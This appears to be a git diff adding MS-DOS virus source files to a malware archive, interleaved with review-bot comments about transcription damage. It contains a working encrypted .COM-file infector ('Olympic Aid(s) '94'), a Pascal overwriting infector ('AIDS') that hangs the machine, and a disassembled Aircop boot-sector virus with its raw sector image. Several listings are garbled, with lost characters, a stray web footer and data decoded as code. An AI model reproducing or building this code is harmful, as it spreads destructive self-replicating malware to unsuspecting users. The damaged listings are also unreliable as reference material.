+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address
+
+ mov bp,sp ; BP points to local buffer
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer
+ int 021h
+
+ mov ah,04Eh ; DOS find first function
+ mov cx,00010000b ; CX holds search attributes
+ lea dx,[di + all_files] ; DX points to "*.*"
+ int 021h
+ jc leave_traverse ; Leave if no files present
+
+check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
+ jne another_dir ; If not, try again
+ cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
+ je another_dir ;If so, keep going
+
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[bp - 98] ; DX points to new directory
+ int 021h
+
+ call traverse ; Recursively call ourself
+
+ pushf ; Save the flags
+ mov ah,03Bh ; DOS change directory function
+ lea dx,[di + up_dir] ; DX points to parent directory
+ int 021h
+ popf ; Restore the flags
+
+ jnc done_searching ; If we infected then exit
+
+another_dir: mov ah,04Fh ; DOS find next function
+ int 021h
+ jnc check_dir ; If found check the file
+
+leave_traverse:
+ lea dx,[di + com_mask] ; DX points to "*.COM"
+ call find_files ; Try to infect a file
+done_searching: mov sp,bp ; Restore old stack frame
+ mov ah,01Ah ; DOS set DTA function
+ pop dx ; Retrieve old DTA address
+ int 021h
+
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+up_dir db "..",0 ; Parent directory name
+all_files db "*.*",0 ; Directories to search for
+com_mask db "*.COM",0 ; Mask for all .COM files
+traverse endp
+
+
+ ; -- FIND MORE FILES -------
+
+find_files proc near
+ push bp ; Save BP
+
+ mov ah,02Fh ; DOS get DTA function
+ int 021h
+ push bx ; Save old DTA address
+
+ mov bp,sp ; BP points to local buffer
+ sub sp,128 ; Allocate 128 bytes on stack
+
+ push dx ; Save file mask
+ mov ah,01Ah ; DOS set DTA function
+ lea dx,[bp - 128] ; DX points to buffer
+ int 021h
+
+ mov ah,04Eh ; DOS find first file function
+ mov cx,00100111b ; CX holds all file attributes
+ pop dx ; Restore file mask
+find_a_file: int 021h
+ jc done_finding ; Exit if no files found
+ call infect_file ; Infect the file!
+ jnc done_finding ; Exit if no error
+ mov ah,04Fh ; DOS find next file function
+ jmp short find_a_file ; Try finding another file
+
+done_finding: mov sp,bp ; Restore old stack frame
+ mov ah,01Ah ; DOS set DTA function
+ pop dx ; Retrieve old DTA address
+ int 021h
+
+ pop bp ; Restore BP
+ ret ; Return to caller
+find_files endp
+
+
+ ; -- FUCK A FILE -------
+
+infect_file proc near
+ mov ah,02Fh ; DOS get DTA address function
+ int 021h
+ mov si,bx ; SI points to the DTA
+
+ mov byte ptr [di + set_carry],0 ; Assume we'll fail
+
+ cmp word ptr [si + 01Ah],(65279 - (finish - start))
+ jbe size_ok ; If it's small enough continue
+ jmp infection_done ; Otherwise exit
+
+size_ok: mov ax,03D00h ; DOS open file function, r/o
+ lea dx,[si + 01Eh] ; DX points to file name
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,03Fh ; DOS read from file function
+ mov cx,3 ; CX holds bytes to read (3)
+ lea dx,[di + buffer] ; DX points to buffer
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ xchg dx,ax ; Faster than a PUSH AX
+ mov ah,03Eh ; DOS close file function
+ int 021h
+ xchg dx,ax ; Faster than a POP AX
+
+ sub ax,finish - start + 3 ; Adjust AX for a valid jump
+ cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
+ je infection_done ; If equal then exit
+ mov byte ptr [di + set_carry],1 ; Success -- the file is OK
+ add ax,finish - start ; Re-adjust to make the jump
+ mov word ptr [di + new_jump + 1],ax ; Construct jump
+
+ mov ax,04301h ; DOS set file attrib. function
+ xor cx,cx ; Clear all attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+ mov ax,03D02h ; DOS open file function, r/w
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,040h ; DOS write to file function
+ mov cx,3 ; CX holds bytes to write (3)
+ lea dx,[di + new_jump] ; DX points to the jump we made
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ push si ; Save SI through call
+ call encrypt_code ; Write an encrypted copy
+ pop si ; Restore SI
+
+ mov ax,05701h ; DOS set file time function
+ mov cx,[si + 016h] ; CX holds old file time
+ mov dx,[si + 018h] ; DX holds old file date
+ int 021h
+
+ mov ah,03Eh ; DOS close file function
+ int 021h
+
+ mov ax,04301h ; DOS set file attrib. function
+ xor ch,ch ; Clear CH for file attribute
+ mov cl,[si + 015h] ; CX holds file's old attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
+ ret ; Return to caller
+
+set_carry db ? ; Set-carry-on-exit flag
+buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
+new_jump db 0E9h,?,? ; New jump to virus
+infect_file endp
+
+
+ ; -- CRUNCHED OLYMPIC RINGS ------
+
+AnsiData: DB 15,16,24,24,24,1,26,17,' ',15,'L i l l e h a'
+ DB ' m m e r ',39,' 9 4 ',1,26,17,'',24,24,25,20
+ DB 'Haakon And Kristin Blew It Up Again...',24,25,19,26,5
+ DB '',25,10,8,26,5,'',25,10,4,26,5,'',24,25,16,1,''
+ DB '',25,3,'',25,4,8,'',25,3,'',25,4,4,''
+ DB '',25,3,'',24,25,15,1,'',25,8,14,'',17,'',1
+ DB 16,'',14,'',8,'',25,8,2,'',8,18,'',16,'',2,''
+ DB '',4,'',25,9,'',24,25,14,1,'',25,6,14,' '
+ DB 1,' ',8,'',14,'',25,4,2,' ',8,' ',20,' ',0
+ DB '',2,16,'',25,9,4,'',24,25,14,1,'',25,5,14,''
+ DB '',25,3,1,' ',8,' ',14,'',25,2,2,'',25,3,8,''
+ DB ' ',4,' ',2,'',25,8,4,'',24,25,15,1,'',25,3,14
+ DB '',25,3,1,'',25,2,8,' ',14,' ',2,'',25,3,8,''
+ DB '',25,2,4,' ',2,'',25,6,4,'',24,25,16,1,''
+ DB ' ',14,' ',1,'',25,4,8,'',14,' ',2,' ',8,''
+ DB '',25,4,4,'',2,'',25,3,4,'',24,25,19,1,''
+ DB '',14,17,'',1,16,'',25,8,14,'',8,'',2,'',8
+ DB 18,'',16,'',25,8,2,'',4,26,5,'',24,25,23,14,''
+ DB '',25,3,'',25,4,2,'',25,3,'',0,18,'',24
+ DB 16,25,26,14,26,5,'',25,10,2,26,5,'',25,12,0,'1',24,1
+ DB 'This Time They Have Been Fucking Around With The Ol'
+ DB 'ympic Computers, And Managed',24,25,2,'To Infect A '
+ DB 'Lot Of Your Computers With A Little Tiny Destructiv'
+ DB 'e Virus...',24,24,'Now, Antonio, You Can',39,'t Let'
+ DB ' Them Runaway With This, Punish The Little Bastards'
+ DB '!',24,24,26,'O',24,24,24,24
+AnsiEnd: DB 0
+
+
+ ; -- WRITE ENCRYPTED COPY -------
+
+encrypt_code proc near
+ push bp ; Save BP
+ mov bp,di ; Use BP as pointer to code
+ lea si,[bp + encrypt_decrypt]; SI points to cipher routine
+
+ xor ah,ah ; BIOS get time function
+ int 01Ah
+ mov word ptr [si + 9],dx ; Low word of timer is new key
+
+ xor byte ptr [si + 1],8 ;
+ xor byte ptr [si + 8],1 ; Change all SIs to DIs
+ xor word ptr [si + 11],0101h; (and vice-versa)
+
+ lea di,[bp + finish] ; Copy routine into heap
+ mov cx,finish - encrypt_decrypt - 1 ; All but final RET
+ push si ; Save SI for later
+ push cx ; Save CX for later
+ rep movsb ; Copy the bytes
+
+ lea si,[bp + write_stuff] ; SI points to write stuff
+ mov cx,5 ; CX holds length of write
+ rep movsb ; Copy the bytes
+
+ pop cx ; Restore CX
+ pop si ; Restore SI
+ inc cx ; Copy the RET also this time
+ rep movsb ; Copy the routine again
+
+ mov ah,040h ; DOS write to file function
+ lea dx,[bp + start] ; DX points to virus
+
+ lea si,[bp + finish] ; SI points to routine
+ call si ; Encrypt/write/decrypt
+
+ mov di,bp ; DI points to virus again
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+write_stuff: mov cx,finish - start ; Length of code
+ int 021h
+encrypt_code endp
+
+end_of_code label near
+
+ ; -----------
+
+ Note db " Olympic Aid(s) '94 "
+ db " (c) The Penetrator "
+
+ ; -- ENCRYPT/DECRYPT -------
+
+encrypt_decrypt proc near
+ lea si,[bp + start_of_code] ; SI points to code to decrypt
+ mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
+xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
+ inc si ; Do the next word
+ inc si ;
+ loop xor_loop ; Loop until we're through
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label near
+
+code ends
+ end main
+
+
+ ; -- END OF STORY -------
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.aids.pas b/MSDOS/Virus.MSDOS.Unknown.aids.pas
new file mode 100644
index 00000000..075b8695
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.aids.pas
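Review bot: The `AnsiData` table in this listing is full of empty string items (`DB '',25,10,8,26,5,'',...`) where the original extended-ASCII bytes were evidently dropped in transcription, so the length `AnsiEnd-AnsiData` and the size of the block copied by `encrypt_code` no longer correspond to the sample this file claims to be, and an assembler is unlikely to accept the empty literals at all. For a corpus entry that matters: anyone deriving sizes, offsets or signatures from this listing will get values that do not match the in-the-wild sample. I would put an archive note at the top of the file, e.g. `; ARCHIVE NOTE: transcribed listing - extended-ASCII bytes in AnsiData were lost; not byte-identical to the original sample`. The same transcription loss affects the next two files in this commit (Virus.MSDOS.Unknown.aids.pas and Virus.MSDOS.Unknown.aircop.asm).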
@@ -0,0 +1,302 @@ +{AIDS + +Although this is a primitive virus its effective. +In this virus only the .COM +files are infected. Its about 13K and it will +change the date entry.} + +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } +{ -- Constants --------------------------------------- } +Const + VirusSize = 13847; { AIDS's code size } + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; +{ -- Type declarations------------------------------------- } +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; +{ -- Variables--------------------------------------------- } +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} +{ -- Program code------------------------------------------ } +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) < UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); 
{ Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID < Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln('_'); {Give a lot of smiles} +Writeln('__'); +Writeln(' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +'); +Writeln(' + ATTENTION: +'); +Writeln(' + I have been elected to inform you that throughout your process of +'); +Writeln(' + collecting and executing files, you have accidentally _HK_ +'); +Writeln(' + yourself over; again, that''s PHUCKED yourself over. No, it cannot +'); +Writeln(' + be; YES, it CAN be, a -s has infected your system. Now what do +'); +Writeln(' + you have to say about that? HAHAHAHA. 
Have _H¥ with this one and +'); +Writeln(' + remember, there is NO cure for +'); +Writeln(' + +'); +Writeln(' + +'); +Writeln(' + ±±±±±± ±±±±±±±±±± ±±±±±±± ±±±±±±± +'); +Writeln(' + ±± ± ± ± ± ±± ±± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ± ± +'); +Writeln(' + ±±±±±±±±± ± ± ± ±±±±±±±±±± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ± ± ± ± +'); +Writeln(' + ± ± ±± ±± +'); +Writeln(' + ±± ±± ±±±±±±±±±±±± ±±±±±±±±±±± ±±±±±±±±±± +'); +Writeln(' + +'); +Writeln(' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +'); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +This page hosted by Get your own Free Homepage diff --git a/MSDOS/Virus.MSDOS.Unknown.aircop.asm b/MSDOS/Virus.MSDOS.Unknown.aircop.asm new file mode 100644 index 00000000..d33a47a0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.aircop.asm 
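Review bot: The file does not end at `End.`: a web-hosting footer (`This page hosted by Get your own Free Homepage`) follows it, and the `Writeln` banner lines and `If B 0 then` show the same stripping damage, so what is committed is a page scrape rather than the program text. Pascal tooling run over the corpus will stop at the footer, and anyone comparing this against a recovered sample will see spurious differences. I would drop the footer line and open the file with `{ ARCHIVE NOTE: scraped from a web page; operators and extended characters were lost - not a buildable reference }`.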
@@ -0,0 +1,467 @@ +͸ + Aircop Virus (c)RABiD Source Code + Ripped by : The Head Hunter [FS] + + Seem's this baby only work on Bare 360k Drive + System. Neat Anywayz. And it's Undetectable! + + +; + MOV AX, CS + MOV DS, AX + MOV SP, 03b6h + MOV AH, 00h + MOV AL, 03h + INT 10h ;Set video mode + MOV DX, 052bh + MOV AH, 09h + INT 21h ;"AIRCOP Test Version" + MOV DX, 03c3h + MOV AH, 09h + INT 21h ;" + + MOV DX, 04e5h + MOV AH, 09h + INT 21h ;"Aircop Virus$Cannot" + MOV DX, 0464h + MOV AH, 09h + INT 21h ;"" into your 360K di" + MOV DX, 0480h + MOV AH, 09h + INT 21h ;"Put a 360K (Blank F" + MOV AX, 0040h + MOV ES, AX + + PUSH WORD PTR ES:[Data5] + + POP WORD PTR ES:[Data6] + MOV AX, CS + MOV ES, AX + MOV AH, 08h + INT 21h ;Get char w/o echo + MOV CX, 0003h + PUSH CX + MOV AX, 0201h + MOV BX, 05d0h + MOV CX, 0001h + MOV DX, 0000h + INT 13h ;Read disk sectors + POP CX + JNB Jmp0 + LOOP Data7 + MOV DX, 04f2h + MOV AH, 09h + INT 21h ;"Cannot read boot re" + MOV AX, 4cffh + INT 21h ;Exit + + XOR WORD PTR CS:[BP+Data17], 7420h + PUSH CX + MOV AX, 0301h + MOV BX, 05d0h + MOV CX, 2709h + MOV DX, 0100h + INT 13h ;Write disk sectors + POP CX + JNB Jmp4 + LOOP Data18 + MOV DX, 050eh + MOV AH, 09h + INT 21h ;"Cannot write boot r" + MOV AX, 4cffh + INT 21h ;Exit + + MOV CX, 0003h + PUSH CX + MOV AX, 0301h + MOV BX, 07d0h + MOV CX, 0001h + MOV DX, 0000h + INT 13h ;Write disk sectors + POP CX + JNB Jmp5 + LOOP Data20 + MOV DX, 057ch + MOV AH, 09h + INT 21h ;"Cannot write virus " + MOV AX, 4cffh + INT 21h ;Exit + + MOV DX, 04e5h + MOV AH, 09h + INT 21h ;"Aircop Virus$Cannot" + MOV DX, 059eh + MOV AH, 09h + INT 21h ;" was installed into" + MOV AX, 4c00h + INT 21h ;Exit + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK STAC' + db 'K STACK STACK ' + db 'STACK STACK ' + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR 
[BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE 
PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [BP+DI+Data9], DL + INC CX + INC BX + DEC BX + AND BYTE PTR [BX+SI], AH + AND BYTE PTR [DI], CL + + OR AL, BYTE PTR [BX+DI+Data11] + JZ Jmp1 
+ OUTSB + JZ Jmp2 + OUTSW + OUTSB + CMP AH, BYTE PTR [BX+SI] + PUSH SP + PUSH BYTE PTR [BX+DI+Data12], 7620h + db 'irus sample uses onl' + db 'y in research teams.' + db 0d,0a + db ' Please do' + db ' not use in joking o' + db 'r setting tra' + + XOR WORD PTR CS:[BX+SI], 6e69h + + XOR WORD PTR CS:[BP+SI+Data13], 2073h + OUTSW + OUTSB + AND BYTE PTR [BP+DI+Data14], DH + INSW + db 'eone.' + db 0d,0a,0d,0a + db 'Warning! This file i' + + XOR WORD PTR CS:[BX+Data15], 2e65h + db 'nstalls "$" into you' + + db 'r 360K disk!' + db 0d,0a,0d,0a,07 + db '$Put a 360K (Blank F' + + db 'ormatted) disk into ' + db 'drive A:' + db 0d,0a + db 'Strike any key to in' + db 'stall, or CTRL-BREAK' + db ' to quit.' + db 0d,0a + db '$Aircop Virus$Cannot' + + + db ' read boot record.' + db 0d,0a,07 + db '$Cannot write boot r' + + db 'ecord.' + db 0d,0a,07 + db '$AIRCOP Test Version' + + db ': Property of The RA' + db 'BID Nat'nl Developme' + db 'nt Corp. '91' + db 0d,0a,20,24,0d,0a,0d,0a,0d,0a + + db 'Cannot write virus b' + db 'oot record' + db 0d,0a,07 + db '$ was installed into' + + db ' this 360K disk. BE ' + db 'CAREFUL!' 
+ db 0d,0a,24,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,eb,34,90,49,42 + db 'M 3.3' + db 00,02,02,01,00,02,70,00,d0,02,fd,02,00,09,00,02,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,12,00,00,00 + db 00,01,00,fa,33,c0,8e,d8,8e,d0,bb,00,7c,8b,e3,1e,53,ff,0e,13 + db 04,cd,12,b1,06,d3,e0,8e,c0,87,06,4e,00,a3,ab,7d,b8,28,01,87 + db 
06,4c,00,a3,a9,7d,8c,c0,87,06,66,00,a3,af,7d,b8,bb,00,87,06 + db 64,00,a3,ad,7d,33,ff,8b,f3,b9,00,01,fc,f3,a5,fb,06,b8,85,00 + db 50,cb,53,32,d2,e8,70,00,5b,1e,07,b4,02,b6,01,e8,8a,00,72,10 + db 0e,1f,be,0b,00,bf,0b,7c,b9,2b,00,fc,f3,a6,74,07,5b,58,0e,b8 + db af,00,50,cb,0e,1f,be,db,01,e8,23,00,32,e4,cd,16,33,c0,cd,13 + db 0e,07,bb,0d,02,b9,06,00,33,d2,b8,01,02,cd,13,72,df,b9,f0,0f + db 8e,d9,2e,ff,2e,ad,01,bb,07,00,fc,ac,0a,c0,74,44,79,05,34,d7 + db 80,cb,88,3c,20,76,07,b9,01,00,b4,09,cd,10,b4,0e,cd,10,eb,df + db bb,00,02,b9,02,00,8a,e1,e8,17,00,b9,09,27,26,80,37,fd,74,03 + db b9,0f,4f,eb,13,90,b4,02,bb,00,02,b9,01,00,b6,00,b0,01,9c,2e + db ff,1e,a9,01,c3,50,53,51,52,06,1e,56,57,9c,0e,1f,80,fa,01,77 + db 54,25,00,fe,74,4f,86,c5,d0,e0,02,c6,b4,09,f6,e4,03,c1,2c,06 + db 3d,06,00,77,3c,0e,07,e8,c0,ff,72,30,bf,43,00,be,50,02,b9,0e + db 00,fd,f3,a6,74,27,2b,f1,2b,f9,b1,33,f3,a4,e8,8b,ff,51,53,e8 + db a0,ff,b4,03,33,db,e8,9e,ff,5b,59,72,07,b6,01,b4,03,e8,98,ff + db 33,c0,e8,95,ff,b4,04,cd,1a,80,fe,09,75,06,be,b1,01,e8,3f,ff + db 9d,5f,5e,1f,07 + db 'ZY[X.' + db ff,2e,a9,01,59,ec,02,c6,f2,e6,00,f0,da,dd,20,83,bf,be,a4,f7 + db be,a4,f7,96,be,a5,b4,b8,a7,da,dd,00 + db 'IO SYSMSDOS S' + db 59,53,0d,0a + db 'Non-system disk or d' + db 'isk error' + db 0d,0a,00,00,55,aa + + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.alameda.asm b/MSDOS/Virus.MSDOS.Unknown.alameda.asm new file mode 100644 index 00000000..287ade7e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.alameda.asm 
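Review bot: This file is a raw disassembler listing rather than source: the header text above the first `;` is not commented out, the long run of `AND BYTE PTR [BP+DI+Data9], DL / INC CX / INC BX / DEC BX` after the `db 'STACK STACK ...'` strings is the stack area decoded as instructions, the message strings are interrupted by mis-decoded opcodes (`XOR WORD PTR CS:[BX+SI], 6e69h` sits in the middle of the "virus sample uses only in research teams" text), and the tail is a byte-for-byte sector image ending in the `55,aa` boot signature. None of that assembles, and the embedded image means this text file carries the sample itself, which corpus indexing and scanning tooling should be told about. A one-line header would make that explicit: `; ARCHIVE NOTE: raw disassembly listing, not assemblable; data and stack regions decoded as code, tail is a boot-sector byte image`.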
@@ -0,0 +1,381 @@
+;-----------------------------------------------------------------------;
+; This virus is of the "FLOPPY ONLY" variety. ;
+; It replicates to the boot sector of a floppy disk and when it gains control
